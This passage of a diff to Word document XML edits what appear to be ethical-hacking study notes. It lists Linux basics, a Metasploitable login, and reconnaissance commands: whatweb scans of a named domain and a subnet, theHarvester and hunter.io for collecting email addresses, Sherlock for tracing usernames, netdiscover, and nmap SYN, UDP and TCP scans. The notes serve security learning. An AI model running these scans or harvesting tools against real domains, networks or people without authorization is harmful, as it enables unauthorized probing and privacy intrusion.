+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F21451"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="033ECDDE"/>
@@ -7442,7 +8895,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3509666A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9CD64556"/>
@@ -7531,7 +8984,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48EF3815"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6668300A"/>
@@ -7620,7 +9073,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E7511"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3D007ACE"/>
@@ -7709,7 +9162,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66D8281C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="162256E8"/>
@@ -7798,26 +9251,121 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="79E35021"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3DA6568C"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1830051639">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1548644043">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="92751156">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="390814802">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1514765802">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="2140680956">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1634290607">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="1474054670">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="2020355101">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Ethical Hacking.docx
+++ b/Ethical Hacking.docx
@@ -228,19 +228,9 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ifconfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>sudo ifconfig</w:t>
+            </w:r>
           </w:p>
           <w:p/>
           <w:p/>
@@ -274,13 +264,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>pwd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – current directory</w:t>
+            <w:r>
+              <w:t>pwd – current directory</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -315,14 +300,12 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>M</w:t>
             </w:r>
             <w:r>
               <w:t>kdir</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – add folder</w:t>
             </w:r>
@@ -420,13 +403,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Virtual Machine </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Virtual Machine msfadmin</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -535,21 +513,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – ROOT USER</w:t>
+            <w:r>
+              <w:t>sudo su – ROOT USER</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -743,19 +708,11 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Nglookup</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> erertech.com</w:t>
+              <w:t>Nglookup erertech.com</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -766,7 +723,6 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -779,7 +735,6 @@
               </w:rPr>
               <w:t>hois</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="green"/>
@@ -810,13 +765,8 @@
                 <w:numId w:val="2"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> erertech.com -v</w:t>
+            <w:r>
+              <w:t>Whatweb erertech.com -v</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -851,7 +801,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -864,7 +813,6 @@
               </w:rPr>
               <w:t>hatweb</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -884,7 +832,6 @@
                 <w:color w:val="FF0000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -895,97 +842,259 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>hatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve">hatweb </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t>erertech.com</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -v</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>whatweb 192</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>.168.1.4-192.168.1.255</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>erertech.com</w:t>
+              <w:t>–no</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -v</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>error</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>whatweb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 192</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>.168.1.4-192.168.1.255</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> – aggression 3 -v</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t xml:space="preserve">Tool: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
+              <w:t xml:space="preserve">Getting email using </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>the Harvester &amp; hunger.io</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>–no</w:t>
+              <w:t>-</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>-</w:t>
+              <w:t>theHarvester</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>error</w:t>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>help</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-theHarvester -d erertech.com </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-b all</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>OR</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>-hunter.io</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0DF"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> find email</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Redhawk(</w:t>
+            </w:r>
+            <w:r>
+              <w:t>software tools</w:t>
+            </w:r>
+            <w:r>
+              <w:t>)</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -993,222 +1102,19 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Tool: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Getting email using </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>the Harvester &amp; hunger.io</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>help</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>theHarvester</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -d erertech.com </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-b all</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>OR</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>-hunter.io</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:sym w:font="Wingdings" w:char="F0DF"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> find email</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>Redhawk(</w:t>
-            </w:r>
-            <w:r>
-              <w:t>software tools</w:t>
-            </w:r>
-            <w:r>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
             <w:r>
               <w:t>Sherlock -&gt; python3 sherlock.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt update</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> apt install python-pip</w:t>
+            <w:r>
+              <w:t>Sudo apt update</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo apt install python-pip</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1467,31 +1373,13 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>netdiscover</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo netdiscover</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1713,17 +1601,63 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Nmap -sS {IPADDRESS}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t>never full connection</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>SYN</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> connection – better use</w:t>
+            </w:r>
+            <w:r>
+              <w:t>!</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Nmap -s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1731,60 +1665,13 @@
               </w:rPr>
               <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – </w:t>
-            </w:r>
-            <w:r>
-              <w:t>never full connection</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SYN</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> connection – better use</w:t>
-            </w:r>
-            <w:r>
-              <w:t>!</w:t>
-            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sU</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -1792,38 +1679,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
